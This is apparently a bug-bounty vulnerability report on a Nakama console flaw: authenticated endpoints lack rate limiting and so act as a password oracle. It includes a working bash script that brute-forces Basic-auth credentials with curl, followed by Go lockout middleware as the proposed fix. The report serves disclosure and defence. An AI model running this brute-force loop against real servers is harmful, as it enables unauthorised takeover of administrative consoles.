Login bruteforce in heroiclabs/nakama
Reported on
Aug 24th 2022
Description
Following the fix for the previous report, the console login endpoint rate-limits failed attempts and blocks the client's IP after too many of them. Other console endpoints, for example /v2/console/status, also return their content only when the caller presents valid credentials, but requests to those endpoints are not protected against brute-force attacks, so the credential check they perform can be used as a password oracle that bypasses the login-page limit.
Proof of Concept
The console accepts HTTP Basic authentication: an Authorization: Basic header whose value is the base64 encoding of <user>:<password>. An attacker therefore only needs to send candidate <user>:<password> pairs in the Authorization header of a request to an authenticated endpoint and check the HTTP response code; a 200 means the guess was correct, and nothing blocks the client after repeated failures.
#!/bin/bash
# PoC: repeated Basic-auth attempts against an authenticated console endpoint
# are not rate limited, so credentials can be brute-forced without triggering
# the lockout that protects the login page.
HOST="localhost"
PORT=7351
USER="admin"
PASSWORD="password"

# Send one request carrying the given base64(user:password) token and report
# whether the server accepted it (HTTP 200) or rejected it.
request() {
    local token=$1
    local code
    code=$(curl -s -o /dev/null -w '%{http_code}' \
        "http://$HOST:$PORT/v2/console/status" \
        -H "Authorization: Basic $token")
    if [[ $code == 200 ]]; then
        echo ">>> Found: $(echo "$token" | base64 -d) (HTTP $code)"
    else
        echo "Wrong: $(echo "$token" | base64 -d) (HTTP $code)"
    fi
}

# 1000 wrong guesses: none of them triggers a block...
for i in {1..1000}; do
    request "$(echo -n "user:password$i" | base64)"
done
# ...so the correct credentials are still accepted afterwards.
request "$(echo -n "$USER:$PASSWORD" | base64)"
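The fix this report asks for is to put the same failed-attempt lockout in front of every console endpoint that checks credentials, not only the login route. The Go middleware below is an added example written for this page, not Nakama's own code: the Limiter type, the 5-attempts/15-minute threshold, the /v2/console/status path and the hard-coded admin/password credentials are all assumptions. Probe replays one iteration of the PoC loop in-process so the behaviour can be observed without running a server.

```go
package main

import (
	"crypto/subtle"
	"fmt"
	"net"
	"net/http"
	"net/http/httptest"
	"sync"
	"time"
)

// Limiter blocks a client IP for `window` once it makes `max` failed credential
// checks inside one window. 5 failures / 15 minutes below are assumed values.
type Limiter struct {
	mu     sync.Mutex
	state  map[string]*ipState
	max    int
	window time.Duration
}

type ipState struct {
	failures     int
	resetAt      time.Time // end of the counting window
	blockedUntil time.Time // end of the lockout (zero = not blocked)
}

func NewLimiter(max int, window time.Duration) *Limiter {
	return &Limiter{state: map[string]*ipState{}, max: max, window: window}
}

// Blocked reports whether ip is currently locked out.
func (l *Limiter) Blocked(ip string) bool {
	l.mu.Lock()
	defer l.mu.Unlock()
	s := l.state[ip]
	return s != nil && time.Now().Before(s.blockedUntil)
}

// Fail records one failed attempt and starts the lockout at the threshold.
func (l *Limiter) Fail(ip string) {
	l.mu.Lock()
	defer l.mu.Unlock()
	now := time.Now()
	s := l.state[ip]
	if s == nil || now.After(s.resetAt) {
		s = &ipState{resetAt: now.Add(l.window)}
		l.state[ip] = s
	}
	if s.failures++; s.failures >= l.max {
		s.blockedUntil = now.Add(l.window)
	}
}

// BasicAuthWithLockout wraps any handler that requires console credentials. The
// lockout is checked before the credentials, so every wrapped endpoint gets the
// same protection. Plaintext comparison is a simplification; compare a hash.
func BasicAuthWithLockout(l *Limiter, user, pass string, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		ip, _, err := net.SplitHostPort(r.RemoteAddr)
		if err != nil {
			ip = r.RemoteAddr
		}
		if l.Blocked(ip) {
			http.Error(w, "too many failed attempts", http.StatusTooManyRequests)
			return
		}
		u, p, ok := r.BasicAuth()
		userOK := subtle.ConstantTimeCompare([]byte(u), []byte(user)) == 1
		passOK := subtle.ConstantTimeCompare([]byte(p), []byte(pass)) == 1
		if !ok || !userOK || !passOK {
			l.Fail(ip)
			w.Header().Set("WWW-Authenticate", `Basic realm="console"`)
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// Probe replays one iteration of the report's curl loop in-process.
func Probe(h http.Handler, ip, user, pass string) int {
	req := httptest.NewRequest(http.MethodGet, "/v2/console/status", nil)
	req.RemoteAddr = net.JoinHostPort(ip, "51000")
	req.SetBasicAuth(user, pass)
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	h := BasicAuthWithLockout(NewLimiter(5, 15*time.Minute), "admin", "password",
		http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) { fmt.Fprint(w, "ok") }))
	for i := 1; i <= 6; i++ {
		fmt.Println("wrong guess", i, "->", Probe(h, "10.0.0.1", "user", fmt.Sprint("password", i)))
	}
	fmt.Println("correct password after lockout ->", Probe(h, "10.0.0.1", "admin", "password"))
}
```

Running the block, the sixth probe from 10.0.0.1 returns 429 even though it carries the correct password, while the same request from any other IP still returns 200. Blocking before the credential check is what closes the gap in the report: a limiter applied only inside the login handler leaves every other Basic-auth endpoint usable as an oracle. A production version would also clear the counter on a successful authentication and, when a reverse proxy sits in front of the console, key on the proxy-supplied client address instead of RemoteAddr.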
Impact
An attacker can brute-force console credentials against any authenticated console endpoint without limit, bypassing the IP-based rate limit that was added to the login page. A successful guess yields full console access.